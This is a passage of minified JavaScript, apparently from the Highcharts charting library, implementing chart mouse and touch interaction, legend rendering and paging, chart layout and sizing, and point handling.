s(b.axes,function(a){a.hideCrosshair()});this.hoverX=null}},scaleGroups:function(a,b){var c=this.chart,d;s(c.series,function(e){d=a||e.getPlotBox();e.xAxis&&e.xAxis.zoomEnabled&&(e.group.attr(d),e.markerGroup&&(e.markerGroup.attr(d),e.markerGroup.clip(b?c.clipRect:null)),e.dataLabelsGroup&&e.dataLabelsGroup.attr(d))});c.clipRect.attr(b||c.clipBox)},dragStart:function(a){var b=this.chart;b.mouseIsDown=a.type;b.cancelClick=!1;b.mouseDownX=this.mouseDownX=a.chartX;b.mouseDownY=this.mouseDownY=a.chartY},
drag:function(a){var b=this.chart,c=b.options.chart,d=a.chartX,e=a.chartY,f=this.zoomHor,g=this.zoomVert,h=b.plotLeft,k=b.plotTop,l=b.plotWidth,m=b.plotHeight,n,q=this.mouseDownX,p=this.mouseDownY;d<h?d=h:d>h+l&&(d=h+l);e<k?e=k:e>k+m&&(e=k+m);this.hasDragged=Math.sqrt(Math.pow(q-d,2)+Math.pow(p-e,2));10<this.hasDragged&&(n=b.isInsidePlot(q-h,p-k),b.hasCartesianSeries&&(this.zoomX||this.zoomY)&&n&&!this.selectionMarker&&(this.selectionMarker=b.renderer.rect(h,k,f?1:l,g?1:m,0).attr({fill:c.selectionMarkerFill||
"rgba(69,114,167,0.25)",zIndex:7}).add()),this.selectionMarker&&f&&(d-=q,this.selectionMarker.attr({width:R(d),x:(0<d?0:d)+q})),this.selectionMarker&&g&&(d=e-p,this.selectionMarker.attr({height:R(d),y:(0<d?0:d)+p})),n&&!this.selectionMarker&&c.panning&&b.pan(a,c.panning))},drop:function(a){var b=this.chart,c=this.hasPinched;if(this.selectionMarker){var d={xAxis:[],yAxis:[],originalEvent:a.originalEvent||a};a=this.selectionMarker;var e=a.attr?a.attr("x"):a.x,f=a.attr?a.attr("y"):a.y,g=a.attr?a.attr("width"):
a.width,h=a.attr?a.attr("height"):a.height,k;if(this.hasDragged||c)s(b.axes,function(a){if(a.zoomEnabled){var b=a.horiz,c=a.toValue(b?e:f),b=a.toValue(b?e+g:f+h);isNaN(c)||isNaN(b)||(d[a.coll].push({axis:a,min:J(c,b),max:x(c,b)}),k=!0)}}),k&&C(b,"selection",d,function(a){b.zoom(t(a,c?{animation:!1}:null))});this.selectionMarker=this.selectionMarker.destroy();c&&this.scaleGroups()}b&&(X(b.container,{cursor:b._cursor}),b.cancelClick=10<this.hasDragged,b.mouseIsDown=this.hasDragged=this.hasPinched=!1,
this.pinchDown=[])},onContainerMouseDown:function(a){a=this.normalize(a);a.preventDefault&&a.preventDefault();this.dragStart(a)},onDocumentMouseUp:function(a){Y[Ca]&&Y[Ca].pointer.drop(a)},onDocumentMouseMove:function(a){var b=this.chart,c=this.chartPosition,d=b.hoverSeries;a=this.normalize(a,c);c&&d&&!this.inClass(a.target,"highcharts-tracker")&&!b.isInsidePlot(a.chartX-b.plotLeft,a.chartY-b.plotTop)&&this.reset()},onContainerMouseLeave:function(){var a=Y[Ca];a&&(a.pointer.reset(),a.pointer.chartPosition=
null)},onContainerMouseMove:function(a){var b=this.chart;Ca=b.index;a=this.normalize(a);"mousedown"===b.mouseIsDown&&this.drag(a);!this.inClass(a.target,"highcharts-tracker")&&!b.isInsidePlot(a.chartX-b.plotLeft,a.chartY-b.plotTop)||b.openMenu||this.runPointActions(a)},inClass:function(a,b){for(var c;a;){if(c=G(a,"class")){if(-1!==c.indexOf(b))return!0;if(-1!==c.indexOf("highcharts-container"))return!1}a=a.parentNode}},onTrackerMouseOut:function(a){var b=this.chart.hoverSeries,c=(a=a.relatedTarget||
a.toElement)&&a.point&&a.point.series;if(b&&!b.options.stickyTracking&&!this.inClass(a,"highcharts-tooltip")&&c!==b)b.onMouseOut()},onContainerClick:function(a){var b=this.chart,c=b.hoverPoint,d=b.plotLeft,e=b.plotTop;a=this.normalize(a);a.cancelBubble=!0;b.cancelClick||(c&&this.inClass(a.target,"highcharts-tracker")?(C(c.series,"click",t(a,{point:c})),b.hoverPoint&&c.firePointEvent("click",a)):(t(a,this.getCoordinates(a)),b.isInsidePlot(a.chartX-d,a.chartY-e)&&C(b,"click",a)))},setDOMEvents:function(){var a=
this,b=a.chart.container;b.onmousedown=function(b){a.onContainerMouseDown(b)};b.onmousemove=function(b){a.onContainerMouseMove(b)};b.onclick=function(b){a.onContainerClick(b)};N(b,"mouseleave",a.onContainerMouseLeave);1===Ha&&N(y,"mouseup",a.onDocumentMouseUp);Ga&&(b.ontouchstart=function(b){a.onContainerTouchStart(b)},b.ontouchmove=function(b){a.onContainerTouchMove(b)},1===Ha&&N(y,"touchend",a.onDocumentTouchEnd))},destroy:function(){var a;T(this.chart.container,"mouseleave",this.onContainerMouseLeave);
Ha||(T(y,"mouseup",this.onDocumentMouseUp),T(y,"touchend",this.onDocumentTouchEnd));clearInterval(this.tooltipTimeout);for(a in this)this[a]=null}};var $a=S.Legend=function(a,b){this.init(a,b)};$a.prototype={init:function(a,b){var c=this,d=b.itemStyle,e=r(b.padding,8),f=b.itemMarginTop||0;this.options=b;b.enabled&&(c.baseline=A(d.fontSize)+3+f,c.itemStyle=d,c.itemHiddenStyle=E(d,b.itemHiddenStyle),c.itemMarginTop=f,c.padding=e,c.initialItemX=e,c.initialItemY=e-5,c.maxItemWidth=0,c.chart=a,c.itemHeight=
0,c.lastLineHeight=0,c.symbolWidth=r(b.symbolWidth,16),c.pages=[],c.render(),N(c.chart,"endResize",function(){c.positionCheckboxes()}))},colorizeItem:function(a,b){var c=this.options,d=a.legendItem,e=a.legendLine,f=a.legendSymbol,g=this.itemHiddenStyle.color,c=b?c.itemStyle.color:g,h=b?a.legendColor||a.color||"#CCC":g,g=a.options&&a.options.marker,k={fill:h},l;d&&d.css({fill:c,color:c});e&&e.attr({stroke:h});if(f){if(g&&f.isMarker)for(l in k.stroke=h,g=a.convertAttribs(g),g)d=g[l],d!==v&&(k[l]=d);
f.attr(k)}},positionItem:function(a){var b=this.options,c=b.symbolPadding,b=!b.rtl,d=a._legendItemPos,e=d[0],d=d[1],f=a.checkbox;a.legendGroup&&a.legendGroup.translate(b?e:this.legendWidth-e-2*c-4,d);f&&(f.x=e,f.y=d)},destroyItem:function(a){var b=a.checkbox;s(["legendItem","legendLine","legendSymbol","legendGroup"],function(b){a[b]&&(a[b]=a[b].destroy())});b&&La(a.checkbox)},destroy:function(){var a=this.group,b=this.box;b&&(this.box=b.destroy());a&&(this.group=a.destroy())},positionCheckboxes:function(a){var b=
this.group.alignAttr,c,d=this.clipHeight||this.legendHeight;b&&(c=b.translateY,s(this.allItems,function(e){var f=e.checkbox,g;f&&(g=c+f.y+(a||0)+3,X(f,{left:b.translateX+e.checkboxOffset+f.x-20+"px",top:g+"px",display:g>c-6&&g<c+d-6?"":ca}))}))},renderTitle:function(){var a=this.padding,b=this.options.title,c=0;b.text&&(this.title||(this.title=this.chart.renderer.label(b.text,a-3,a-4,null,null,null,null,null,"legend-title").attr({zIndex:1}).css(b.style).add(this.group)),a=this.title.getBBox(),c=a.height,
this.offsetWidth=a.width,this.contentGroup.attr({translateY:c}));this.titleHeight=c},renderItem:function(a){var b=this.chart,c=b.renderer,d=this.options,e="horizontal"===d.layout,f=this.symbolWidth,g=d.symbolPadding,h=this.itemStyle,k=this.itemHiddenStyle,l=this.padding,m=e?r(d.itemDistance,20):0,n=!d.rtl,q=d.width,p=d.itemMarginBottom||0,w=this.itemMarginTop,s=this.initialItemX,u=a.legendItem,t=a.series&&a.series.drawLegendSymbol?a.series:a,v=t.options,v=this.createCheckboxForItem&&v&&v.showCheckbox,
y=d.useHTML;u||(a.legendGroup=c.g("legend-item").attr({zIndex:1}).add(this.scrollGroup),t.drawLegendSymbol(this,a),a.legendItem=u=c.text(d.labelFormat?ua(d.labelFormat,a):d.labelFormatter.call(a),n?f+g:-g,this.baseline,y).css(E(a.visible?h:k)).attr({align:n?"left":"right",zIndex:2}).add(a.legendGroup),this.setItemEvents&&this.setItemEvents(a,u,y,h,k),this.colorizeItem(a,a.visible),v&&this.createCheckboxForItem(a));c=u.getBBox();f=a.checkboxOffset=d.itemWidth||a.legendItemWidth||f+g+c.width+m+(v?20:
0);this.itemHeight=g=z(a.legendItemHeight||c.height);e&&this.itemX-s+f>(q||b.chartWidth-2*l-s-d.x)&&(this.itemX=s,this.itemY+=w+this.lastLineHeight+p,this.lastLineHeight=0);this.maxItemWidth=x(this.maxItemWidth,f);this.lastItemY=w+this.itemY+p;this.lastLineHeight=x(g,this.lastLineHeight);a._legendItemPos=[this.itemX,this.itemY];e?this.itemX+=f:(this.itemY+=w+g+p,this.lastLineHeight=g);this.offsetWidth=q||x((e?this.itemX-s-m:f)+l,this.offsetWidth)},getAllItems:function(){var a=[];s(this.chart.series,
function(b){var c=b.options;r(c.showInLegend,u(c.linkedTo)?!1:v,!0)&&(a=a.concat(b.legendItems||("point"===c.legendType?b.data:b)))});return a},render:function(){var a=this,b=a.chart,c=b.renderer,d=a.group,e,f,g,h,k=a.box,l=a.options,m=a.padding,n=l.borderWidth,q=l.backgroundColor;a.itemX=a.initialItemX;a.itemY=a.initialItemY;a.offsetWidth=0;a.lastItemY=0;d||(a.group=d=c.g("legend").attr({zIndex:7}).add(),a.contentGroup=c.g().attr({zIndex:1}).add(d),a.scrollGroup=c.g().add(a.contentGroup));a.renderTitle();
e=a.getAllItems();fb(e,function(a,b){return(a.options&&a.options.legendIndex||0)-(b.options&&b.options.legendIndex||0)});l.reversed&&e.reverse();a.allItems=e;a.display=f=!!e.length;s(e,function(b){a.renderItem(b)});g=l.width||a.offsetWidth;h=a.lastItemY+a.lastLineHeight+a.titleHeight;h=a.handleOverflow(h);if(n||q)g+=m,h+=m,k?0<g&&0<h&&(k[k.isNew?"attr":"animate"](k.crisp({width:g,height:h})),k.isNew=!1):(a.box=k=c.rect(0,0,g,h,l.borderRadius,n||0).attr({stroke:l.borderColor,"stroke-width":n||0,fill:q||
ca}).add(d).shadow(l.shadow),k.isNew=!0),k[f?"show":"hide"]();a.legendWidth=g;a.legendHeight=h;s(e,function(b){a.positionItem(b)});f&&d.align(t({width:g,height:h},l),!0,"spacingBox");b.isResizing||this.positionCheckboxes()},handleOverflow:function(a){var b=this,c=this.chart,d=c.renderer,e=this.options,f=e.y,f=c.spacingBox.height+("top"===e.verticalAlign?-f:f)-this.padding,g=e.maxHeight,h,k=this.clipRect,l=e.navigation,m=r(l.animation,!0),n=l.arrowSize||12,q=this.nav,p=this.pages,w,u=this.allItems;
"horizontal"===e.layout&&(f/=2);g&&(f=J(f,g));p.length=0;a>f&&!e.useHTML?(this.clipHeight=h=f-20-this.titleHeight-this.padding,this.currentPage=r(this.currentPage,1),this.fullHeight=a,s(u,function(a,b){var c=a._legendItemPos[1],d=z(a.legendItem.getBBox().height),e=p.length;if(!e||c-p[e-1]>h&&(w||c)!==p[e-1])p.push(w||c),e++;b===u.length-1&&c+d-p[e-1]>h&&p.push(c);c!==w&&(w=c)}),k||(k=b.clipRect=d.clipRect(0,this.padding,9999,0),b.contentGroup.clip(k)),k.attr({height:h}),q||(this.nav=q=d.g().attr({zIndex:1}).add(this.group),
this.up=d.symbol("triangle",0,0,n,n).on("click",function(){b.scroll(-1,m)}).add(q),this.pager=d.text("",15,10).css(l.style).add(q),this.down=d.symbol("triangle-down",0,0,n,n).on("click",function(){b.scroll(1,m)}).add(q)),b.scroll(0),a=f):q&&(k.attr({height:c.chartHeight}),q.hide(),this.scrollGroup.attr({translateY:1}),this.clipHeight=0);return a},scroll:function(a,b){var c=this.pages,d=c.length,e=this.currentPage+a,f=this.clipHeight,g=this.options.navigation,h=g.activeColor,g=g.inactiveColor,k=this.pager,
l=this.padding;e>d&&(e=d);0<e&&(b!==v&&(ea=r(b,this.chart.animation)),this.nav.attr({translateX:l,translateY:f+this.padding+7+this.titleHeight,visibility:"visible"}),this.up.attr({fill:1===e?g:h}).css({cursor:1===e?"default":"pointer"}),k.attr({text:e+"/"+d}),this.down.attr({x:18+this.pager.getBBox().width,fill:e===d?g:h}).css({cursor:e===d?"default":"pointer"}),c=-c[e-1]+this.initialItemY,this.scrollGroup.animate({translateY:c}),this.currentPage=e,this.positionCheckboxes(c))}};var Vb=S.LegendSymbolMixin=
{drawRectangle:function(a,b){var c=a.options.symbolHeight||12;b.legendSymbol=this.chart.renderer.rect(0,a.baseline-5-c/2,a.symbolWidth,c,a.options.symbolRadius||0).attr({zIndex:3}).add(b.legendGroup)},drawLineMarker:function(a){var b=this.options,c=b.marker,d;d=a.symbolWidth;var e=this.chart.renderer,f=this.legendGroup;a=a.baseline-z(0.3*e.fontMetrics(a.options.itemStyle.fontSize).b);var g;b.lineWidth&&(g={"stroke-width":b.lineWidth},b.dashStyle&&(g.dashstyle=b.dashStyle),this.legendLine=e.path(["M",
0,a,"L",d,a]).attr(g).add(f));c&&!1!==c.enabled&&(b=c.radius,this.legendSymbol=d=e.symbol(this.symbol,d/2-b,a-b,2*b,2*b).add(f),d.isMarker=!0)}};(/Trident\/7\.0/.test(ma)||Sa)&&cb($a.prototype,"positionItem",function(a,b){var c=this,d=function(){b._legendItemPos&&a.call(c,b)};d();setTimeout(d)});Qa.prototype={init:function(a,b){var c,d=a.series;a.series=null;c=E(I,a);c.series=a.series=d;this.userOptions=a;d=c.chart;this.margin=this.splashArray("margin",d);this.spacing=this.splashArray("spacing",d);
var e=d.events;this.bounds={h:{},v:{}};this.callback=b;this.isResizing=0;this.options=c;this.axes=[];this.series=[];this.hasCartesianSeries=d.showAxes;var f=this,g;f.index=Y.length;Y.push(f);Ha++;!1!==d.reflow&&N(f,"load",function(){f.initReflow()});if(e)for(g in e)N(f,g,e[g]);f.xAxis=[];f.yAxis=[];f.animation=da?!1:r(d.animation,!0);f.pointCount=0;f.counters=new sb;f.firstRender()},initSeries:function(a){var b=this.options.chart;(b=M[a.type||b.type||b.defaultSeriesType])||fa(17,!0);b=new b;b.init(this,
a);return b},isInsidePlot:function(a,b,c){var d=c?b:a;a=c?a:b;return 0<=d&&d<=this.plotWidth&&0<=a&&a<=this.plotHeight},adjustTickAmounts:function(){!1!==this.options.chart.alignTicks&&s(this.axes,function(a){a.adjustTickAmount()});this.maxTicks=null},redraw:function(a){var b=this.axes,c=this.series,d=this.pointer,e=this.legend,f=this.isDirtyLegend,g,h,k=this.isDirtyBox,l=c.length,m=l,n=this.renderer,q=n.isHidden(),p=[];ea=r(a,this.animation);q&&this.cloneRenderTo();for(this.layOutTitles();m--;)if(a=
c[m],a.options.stacking&&(g=!0,a.isDirty)){h=!0;break}if(h)for(m=l;m--;)a=c[m],a.options.stacking&&(a.isDirty=!0);s(c,function(a){a.isDirty&&"point"===a.options.legendType&&(f=!0)});f&&e.options.enabled&&(e.render(),this.isDirtyLegend=!1);g&&this.getStacks();this.hasCartesianSeries&&(this.isResizing||(this.maxTicks=null,s(b,function(a){a.setScale()})),this.adjustTickAmounts(),this.getMargins(),s(b,function(a){a.isDirty&&(k=!0)}),s(b,function(a){a.isDirtyExtremes&&(a.isDirtyExtremes=!1,p.push(function(){C(a,
"afterSetExtremes",t(a.eventArgs,a.getExtremes()));delete a.eventArgs}));(k||g)&&a.redraw()}));k&&this.drawChartBox();s(c,function(a){a.isDirty&&a.visible&&(!a.isCartesian||a.xAxis)&&a.redraw()});d&&d.reset(!0);n.draw();C(this,"redraw");q&&this.cloneRenderTo(!0);s(p,function(a){a.call()})},get:function(a){var b=this.axes,c=this.series,d,e;for(d=0;d<b.length;d++)if(b[d].options.id===a)return b[d];for(d=0;d<c.length;d++)if(c[d].options.id===a)return c[d];for(d=0;d<c.length;d++)for(e=c[d].points||[],
b=0;b<e.length;b++)if(e[b].id===a)return e[b];return null},getAxes:function(){var a=this,b=this.options,c=b.xAxis=ha(b.xAxis||{}),b=b.yAxis=ha(b.yAxis||{});s(c,function(a,b){a.index=b;a.isX=!0});s(b,function(a,b){a.index=b});c=c.concat(b);s(c,function(b){new sa(a,b)});a.adjustTickAmounts()},getSelectedPoints:function(){var a=[];s(this.series,function(b){a=a.concat(mb(b.points||[],function(a){return a.selected}))});return a},getSelectedSeries:function(){return mb(this.series,function(a){return a.selected})},
getStacks:function(){var a=this;s(a.yAxis,function(a){a.stacks&&a.hasVisibleSeries&&(a.oldStacks=a.stacks)});s(a.series,function(b){!b.options.stacking||!0!==b.visible&&!1!==a.options.chart.ignoreHiddenSeries||(b.stackKey=b.type+r(b.options.stack,""))})},setTitle:function(a,b,c){var d=this,e=d.options,f;f=e.title=E(e.title,a);e=e.subtitle=E(e.subtitle,b);s([["title",a,f],["subtitle",b,e]],function(a){var b=a[0],c=d[b],e=a[1];a=a[2];c&&e&&(d[b]=c=c.destroy());a&&a.text&&!c&&(d[b]=d.renderer.text(a.text,
0,0,a.useHTML).attr({align:a.align,"class":"highcharts-"+b,zIndex:a.zIndex||4}).css(a.style).add())});d.layOutTitles(c)},layOutTitles:function(a){var b=0,c=this.title,d=this.subtitle,e=this.options,f=e.title,e=e.subtitle,g=this.spacingBox.width-44;c&&(c.css({width:(f.width||g)+"px"}).align(t({y:15},f),!1,"spacingBox"),f.floating||f.verticalAlign||(b=c.getBBox().height));d&&(d.css({width:(e.width||g)+"px"}).align(t({y:b+f.margin},e),!1,"spacingBox"),e.floating||e.verticalAlign||(b=ya(b+d.getBBox().height)));
c=this.titleOffset!==b;this.titleOffset=b;!this.isDirtyBox&&c&&(this.isDirtyBox=c,this.hasRendered&&r(a,!0)&&this.isDirtyBox&&this.redraw())},getChartSize:function(){var a=this.options.chart,b=a.width,a=a.height,c=this.renderToClone||this.renderTo;u(b)||(this.containerWidth=Va(c,"width"));u(a)||(this.containerHeight=Va(c,"height"));this.chartWidth=x(0,b||this.containerWidth||600);this.chartHeight=x(0,r(a,19<this.containerHeight?this.containerHeight:400))},cloneRenderTo:function(a){var b=this.renderToClone,
c=this.container;a?b&&(this.renderTo.appendChild(c),La(b),delete this.renderToClone):(c&&c.parentNode===this.renderTo&&this.renderTo.removeChild(c),this.renderToClone=b=this.renderTo.cloneNode(0),X(b,{position:"absolute",top:"-9999px",display:"block"}),b.style.setProperty&&b.style.setProperty("display","block","important"),y.body.appendChild(b),c&&b.appendChild(c))},getContainer:function(){var a,b=this.options.chart,c,d,e;this.renderTo=a=b.renderTo;e="highcharts-"+kb++;U(a)&&(this.renderTo=a=y.getElementById(a));
a||fa(13,!0);c=A(G(a,"data-highcharts-chart"));!isNaN(c)&&Y[c]&&Y[c].hasRendered&&Y[c].destroy();G(a,"data-highcharts-chart",this.index);a.innerHTML="";b.skipClone||a.offsetWidth||this.cloneRenderTo();this.getChartSize();c=this.chartWidth;d=this.chartHeight;this.container=a=ta(tb,{className:"highcharts-container"+(b.className?" "+b.className:""),id:e},t({position:"relative",overflow:"hidden",width:c+"px",height:d+"px",textAlign:"left",lineHeight:"normal",zIndex:0,"-webkit-tap-highlight-color":"rgba(0,0,0,0)"},
b.style),this.renderToClone||a);this._cursor=a.style.cursor;this.renderer=b.forExport?new Za(a,c,d,b.style,!0):new Ta(a,c,d,b.style);da&&this.renderer.create(this,a,c,d)},getMargins:function(){var a=this.spacing,b,c=this.legend,d=this.margin,e=this.options.legend,f=r(e.margin,20),g=e.x,h=e.y,k=e.align,l=e.verticalAlign,m=this.titleOffset;this.resetMargins();b=this.axisOffset;m&&!u(d[0])&&(this.plotTop=x(this.plotTop,m+this.options.title.margin+a[0]));c.display&&!e.floating&&("right"===k?u(d[1])||
(this.marginRight=x(this.marginRight,c.legendWidth-g+f+a[1])):"left"===k?u(d[3])||(this.plotLeft=x(this.plotLeft,c.legendWidth+g+f+a[3])):"top"===l?u(d[0])||(this.plotTop=x(this.plotTop,c.legendHeight+h+f+a[0])):"bottom"!==l||u(d[2])||(this.marginBottom=x(this.marginBottom,c.legendHeight-h+f+a[2])));this.extraBottomMargin&&(this.marginBottom+=this.extraBottomMargin);this.extraTopMargin&&(this.plotTop+=this.extraTopMargin);this.hasCartesianSeries&&s(this.axes,function(a){a.getOffset()});u(d[3])||(this.plotLeft+=
b[3]);u(d[0])||(this.plotTop+=b[0]);u(d[2])||(this.marginBottom+=b[2]);u(d[1])||(this.marginRight+=b[1]);this.setChartSize()},reflow:function(a){var b=this,c=b.options.chart,d=b.renderTo,e=c.width||Va(d,"width"),f=c.height||Va(d,"height"),c=a?a.target:O,d=function(){b.container&&(b.setSize(e,f,!1),b.hasUserSize=null)};if(!b.hasUserSize&&e&&f&&(c===O||c===y)){if(e!==b.containerWidth||f!==b.containerHeight)clearTimeout(b.reflowTimeout),a?b.reflowTimeout=setTimeout(d,100):d();b.containerWidth=e;b.containerHeight=
f}},initReflow:function(){var a=this,b=function(b){a.reflow(b)};N(O,"resize",b);N(a,"destroy",function(){T(O,"resize",b)})},setSize:function(a,b,c){var d=this,e,f,g;d.isResizing+=1;g=function(){d&&C(d,"endResize",null,function(){d.isResizing-=1})};ea=r(c,d.animation);d.oldChartHeight=d.chartHeight;d.oldChartWidth=d.chartWidth;u(a)&&(d.chartWidth=e=x(0,z(a)),d.hasUserSize=!!e);u(b)&&(d.chartHeight=f=x(0,z(b)));(ea?Eb:X)(d.container,{width:e+"px",height:f+"px"},ea);d.setChartSize(!0);d.renderer.setSize(e,
f,c);d.maxTicks=null;s(d.axes,function(a){a.isDirty=!0;a.setScale()});s(d.series,function(a){a.isDirty=!0});d.isDirtyLegend=!0;d.isDirtyBox=!0;d.layOutTitles();d.getMargins();d.redraw(c);d.oldChartHeight=null;C(d,"resize");!1===ea?g():setTimeout(g,ea&&ea.duration||500)},setChartSize:function(a){var b=this.inverted,c=this.renderer,d=this.chartWidth,e=this.chartHeight,f=this.options.chart,g=this.spacing,h=this.clipOffset,k,l,m,n;this.plotLeft=k=z(this.plotLeft);this.plotTop=l=z(this.plotTop);this.plotWidth=
m=x(0,z(d-k-this.marginRight));this.plotHeight=n=x(0,z(e-l-this.marginBottom));this.plotSizeX=b?n:m;this.plotSizeY=b?m:n;this.plotBorderWidth=f.plotBorderWidth||0;this.spacingBox=c.spacingBox={x:g[3],y:g[0],width:d-g[3]-g[1],height:e-g[0]-g[2]};this.plotBox=c.plotBox={x:k,y:l,width:m,height:n};d=2*F(this.plotBorderWidth/2);b=ya(x(d,h[3])/2);c=ya(x(d,h[0])/2);this.clipBox={x:b,y:c,width:F(this.plotSizeX-x(d,h[1])/2-b),height:F(this.plotSizeY-x(d,h[2])/2-c)};a||s(this.axes,function(a){a.setAxisSize();
a.setAxisTranslation()})},resetMargins:function(){var a=this.spacing,b=this.margin;this.plotTop=r(b[0],a[0]);this.marginRight=r(b[1],a[1]);this.marginBottom=r(b[2],a[2]);this.plotLeft=r(b[3],a[3]);this.axisOffset=[0,0,0,0];this.clipOffset=[0,0,0,0]},drawChartBox:function(){var a=this.options.chart,b=this.renderer,c=this.chartWidth,d=this.chartHeight,e=this.chartBackground,f=this.plotBackground,g=this.plotBorder,h=this.plotBGImage,k=a.borderWidth||0,l=a.backgroundColor,m=a.plotBackgroundColor,n=a.plotBackgroundImage,
q=a.plotBorderWidth||0,p,r=this.plotLeft,s=this.plotTop,u=this.plotWidth,t=this.plotHeight,v=this.plotBox,x=this.clipRect,z=this.clipBox;p=k+(a.shadow?8:0);if(k||l)e?e.animate(e.crisp({width:c-p,height:d-p})):(e={fill:l||ca},k&&(e.stroke=a.borderColor,e["stroke-width"]=k),this.chartBackground=b.rect(p/2,p/2,c-p,d-p,a.borderRadius,k).attr(e).addClass("highcharts-background").add().shadow(a.shadow));m&&(f?f.animate(v):this.plotBackground=b.rect(r,s,u,t,0).attr({fill:m}).add().shadow(a.plotShadow));
n&&(h?h.animate(v):this.plotBGImage=b.image(n,r,s,u,t).add());x?x.animate({width:z.width,height:z.height}):this.clipRect=b.clipRect(z);q&&(g?g.animate(g.crisp({x:r,y:s,width:u,height:t})):this.plotBorder=b.rect(r,s,u,t,0,-q).attr({stroke:a.plotBorderColor,"stroke-width":q,fill:ca,zIndex:1}).add());this.isDirtyBox=!1},propFromSeries:function(){var a=this,b=a.options.chart,c,d=a.options.series,e,f;s(["inverted","angular","polar"],function(g){c=M[b.type||b.defaultSeriesType];f=a[g]||b[g]||c&&c.prototype[g];
for(e=d&&d.length;!f&&e--;)(c=M[d[e].type])&&c.prototype[g]&&(f=!0);a[g]=f})},linkSeries:function(){var a=this,b=a.series;s(b,function(a){a.linkedSeries.length=0});s(b,function(b){var d=b.options.linkedTo;U(d)&&(d=":previous"===d?a.series[b.index-1]:a.get(d))&&(d.linkedSeries.push(b),b.linkedParent=d)})},renderSeries:function(){s(this.series,function(a){a.translate();a.setTooltipPoints&&a.setTooltipPoints();a.render()})},render:function(){var a=this,b=a.axes,c=a.renderer,d=a.options,e=d.labels,f=
d.credits,g;a.setTitle();a.legend=new $a(a,d.legend);a.getStacks();s(b,function(a){a.setScale()});a.getMargins();a.maxTicks=null;s(b,function(a){a.setTickPositions(!0);a.setMaxTicks()});a.adjustTickAmounts();a.getMargins();a.drawChartBox();a.hasCartesianSeries&&s(b,function(a){a.render()});a.seriesGroup||(a.seriesGroup=c.g("series-group").attr({zIndex:3}).add());a.renderSeries();e.items&&s(e.items,function(b){var d=t(e.style,b.style),f=A(d.left)+a.plotLeft,g=A(d.top)+a.plotTop+12;delete d.left;delete d.top;
c.text(b.html,f,g).attr({zIndex:2}).css(d).add()});f.enabled&&!a.credits&&(g=f.href,a.credits=c.text(f.text,0,0).on("click",function(){g&&(location.href=g)}).attr({align:f.position.align,zIndex:8}).css(f.style).add().align(f.position));a.hasRendered=!0},destroy:function(){var a=this,b=a.axes,c=a.series,d=a.container,e,f=d&&d.parentNode;C(a,"destroy");Y[a.index]=v;Ha--;a.renderTo.removeAttribute("data-highcharts-chart");T(a);for(e=b.length;e--;)b[e]=b[e].destroy();for(e=c.length;e--;)c[e]=c[e].destroy();
s("title subtitle chartBackground plotBackground plotBGImage plotBorder seriesGroup clipRect credits pointer scroller rangeSelector legend resetZoomButton tooltip renderer".split(" "),function(b){var c=a[b];c&&c.destroy&&(a[b]=c.destroy())});d&&(d.innerHTML="",T(d),f&&La(d));for(e in a)delete a[e]},isReadyToRender:function(){var a=this;return!ba&&O==O.top&&"complete"!==y.readyState||da&&!O.canvg?(da?Gb.push(function(){a.firstRender()},a.options.global.canvasToolsURL):y.attachEvent("onreadystatechange",
function(){y.detachEvent("onreadystatechange",a.firstRender);"complete"===y.readyState&&a.firstRender()}),!1):!0},firstRender:function(){var a=this,b=a.options,c=a.callback;a.isReadyToRender()&&(a.getContainer(),C(a,"init"),a.resetMargins(),a.setChartSize(),a.propFromSeries(),a.getAxes(),s(b.series||[],function(b){a.initSeries(b)}),a.linkSeries(),C(a,"beforeRender"),S.Pointer&&(a.pointer=new Ib(a,b)),a.render(),a.renderer.draw(),c&&c.apply(a,[a]),s(a.callbacks,function(b){b.apply(a,[a])}),a.cloneRenderTo(!0),
C(a,"load"))},splashArray:function(a,b){var c=b[a],c=V(c)?c:[c,c,c,c];return[r(b[a+"Top"],c[0]),r(b[a+"Right"],c[1]),r(b[a+"Bottom"],c[2]),r(b[a+"Left"],c[3])]}};Qa.prototype.callbacks=[];var Ja=function(){};Ja.prototype={init:function(a,b,c){this.series=a;this.applyOptions(b,c);this.pointAttr={};a.options.colorByPoint&&(b=a.options.colors||a.chart.options.colors,this.color=this.color||b[a.colorCounter++],a.colorCounter===b.length&&(a.colorCounter=0));a.chart.pointCount++;return this},applyOptions:function(a,
b){var c=this.series,d=c.pointValKey;a=Ja.prototype.optionsToObject.call(this,a);t(this,a);this.options=this.options?t(this.options,a):a;d&&(this.y=this[d]);this.x===v&&c&&(this.x=b===v?c.autoIncrement():b);return this},optionsToObject:function(a){var b={},c=this.series,d=c.pointArrayMap||["y"],e=d.length,f=0,g=0;if("number"===typeof a||null===a)b[d[0]]=a;else if(ka(a))for(a.length>e&&(c=typeof a[0],"string"===c?b.name=a[0]:"number"===c&&(b.x=a[0]),f++);g<e;)b[d[g++]]=a[f++];else"object"===typeof a&&
(b=a,a.dataLabels&&(c._hasPointLabels=!0),a.marker&&(c._hasPointMarkers=!0));return b},destroy:function(){var a=this.series.chart,b=a.hoverPoints,c;a.pointCount--;b&&(this.setState(),oa(b,this),b.length||(a.hoverPoints=null));if(this===a.hoverPoint)this.onMouseOut();if(this.graphic||this.dataLabel)T(this),this.destroyElements();this.legendItem&&a.legend.destroyItem(this);for(c in this)this[c]=null},destroyElements:function(){for(var a="graphic dataLabel dataLabelUpper group connector shadowGroup".split(" "),
b,c=6;c--;)b=a[c],this[b]&&(this[b]=this[b].destroy())},getLabelConfig:function(){return{x:this.category,y:this.y,key:this.name||this.category,series:this.series,point:this,percentage:this.percentage,total:this.total||this.stackTotal}},tooltipFormatter:function(a){var b=this.series,c=b.tooltipOptions,d=r(c.valueDecimals,""),e=c.valuePrefix||"",f=c.valueSuffix||"";s(b.pointArrayMap||["y"],function(b){b="{point."+b;if(e||f)a=a.replace(b+"}",e+b+"}"+f);a=a.replace(b+"}",b+":,."+d+"f}")});return ua(a,
{point:this,series:this.series})},firePointEvent:function(a,b,c){var d=this,e=this.series.options;(e.point.events[a]||d.options&&d.options.events&&d.options.events[a])&&this.importEvents();"click"===a&&e.allowPointSelect&&(c=function(a){d.select(null,a.ctrlKey||a.metaKey||a.shiftKey)});C(this,a,b,c)}};var ga=function(){};ga.prototype={isCartesian:!0,type:"line",pointClass:Ja,sorted:!0,requireSorting:!0,pointAttrToOptions:{stroke:"lineColor","stroke-width":"lineWidth",fill:"fillColor",r:"radius"},
